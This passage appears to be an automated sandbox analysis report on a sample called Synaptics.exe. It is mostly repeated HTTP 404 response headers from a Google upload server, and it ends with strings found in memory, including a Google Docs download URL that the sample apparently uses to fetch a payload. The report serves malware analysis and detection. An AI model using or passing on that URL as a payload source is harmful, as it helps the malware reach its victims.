ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7t4IjvbaMkTWaJc_jn8pG3XhnnjStaLLV_yWRIynjVbHCQEhAaohIlN7PC6q_WoGgUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:21 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0zrqcvvWIOCk9LBLBlO8Xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6C_HpLn0ifJlg5HdiyY8OGu-Dna7QaV_QXzTjNm-8XM8aiF1ZKxEIVV2WXnLdiIA73Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:21 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-f3QdbNMcWNKHGrz8nEYfiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ZUhcsjEytEFHWrG3I0SdpxD0KO-40Cc7SRMLcpzLGzODKCS7p60GbJfckwSAlpWANXNoXtRcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:24 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-lGIG7fO2dqmaWCC0lF13cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4WM7Hae0nWn28ohK6_l7PPfgLiFuBp4fLO4YgQgLCx5gO2D20h4C-0BfvLOWKRnyDiContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:24 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-XXLu693lqBJwszJBuR606w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC42U7NeHeFEeUozfXoOpuK3ch8O996UDbnt9ABbknjUy-Xwup_fDByBMzqBaIUi57xeE6MZv-0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:25 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vu6-CYJq0P4K0K2zFZJ82w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7NKr3rOUZ5PV0WHzbq-Yjpg8ODmdzf2lAMcwsqR8jHZEC81RsYuccd4olCf1fERXjyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:25 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tCMGV9BrQYBhoDwkSkef2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC52p6EgAv7eVuWBDy83xgMIMCWNQTEvA4Rt6o4of_Iaa_wWXy-ItXi0o1016LrCR2DlContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:26 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-PaYn2esPOg2oPD55cvDejg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Pnzw6IC7dQs6vccov--bdohDXjI6ahqHo4iIAECQWQDH7SsAryJ2e9JOZtoQMKM7tywkr_7EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:27 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zzya00Vx86yFFFlw9_LHng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5xbHscZhjUAC5j9kAMvQaUCXa-3yfOu7RaoYqljKYV8knjX56L1UvKEB0C5Fc9Tu4Pc4Tj0sgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:29 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Z6jKdYZQNpTihdvOzfobAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC53D40FV8zy2Uy0FzXv9g0PLku9ZgXhSCoSOwYRHj6iQ0S7pzTcBVIUnucULY9BCseABGfGTAAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:29 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-3a8-nsDvDMxdsNONszcB0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC67v4XwYxb7u-am1A_nmiXu2EM7sj2zO7nRCCeAz-dA7dtypUC-chXR4tOjjr5YEe6q1ODh6ZQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yj_i6Y5hG_eWK2l_ZPiUfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7G726QDmTYQMO3q9MSuerIbwfTO9Hl74vBRJVaUUN86zt8mb-ywPAce78x2T0RjPm4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:30 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Ga9R7AHblNJFnJ1BhWw0Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5qRgu0OBmV649NRheTdxp1c7CZxKLs9ShCrSLyizh0rNK2IEjHV1_v1tIigC3VSbvCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-MsE6aHpBxO2S3j0qbQiqIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7t0WD-bpPbivLYDUpzxuLMsvMCOYihjejscmkEaQcdN8OatQACHG-1eDbV8pL7RzBceCgvVg0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:33 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-PL36cXIvHzcvqTRvFaVzrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6eLmT1qhSR7aKdwAqkyVNEciZxcL5P_SWOy0LNYQoji3sXccAL8p2Kr8DoeAM39O4LContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:34 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-6UlqBSHfNZDUIY2AG_ls9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5IOqhIUp7Uw-16rJzbrIGZv2vQfEjG3ZHBKwUSHGRqzeeH8YdlkFja2ybPbJNrsBBYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-S8MsMFEcalqjWn9HWJ5rQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC61pQVVNa3vxqZPAlo0auJ9JiKvd_6j3JrQbOF4iNecks9NJUje_kF-gzk8HZxySJKFwEwV41YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:36 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-IkRyUo5EmdZJxsmX14raSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC66P3HpfYHCFpNAm2ol3204aHvW-CKGNGo-232F3Pk5VHVL5GIkEyrBQZGTTc9_0Wu7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-6JzYFZ4z3BlnIkEz-L5xVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6OvPLq_49AU8X_zbQTgnhpkWfKv5xq2n6pn-TiMn2cpRAuyWF9I0Gah7OzSjBnNc8SIYyDoKgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:38 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_iB_8PufKkFaGkso8o2S-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$o%
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2348721322.000000001D7B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 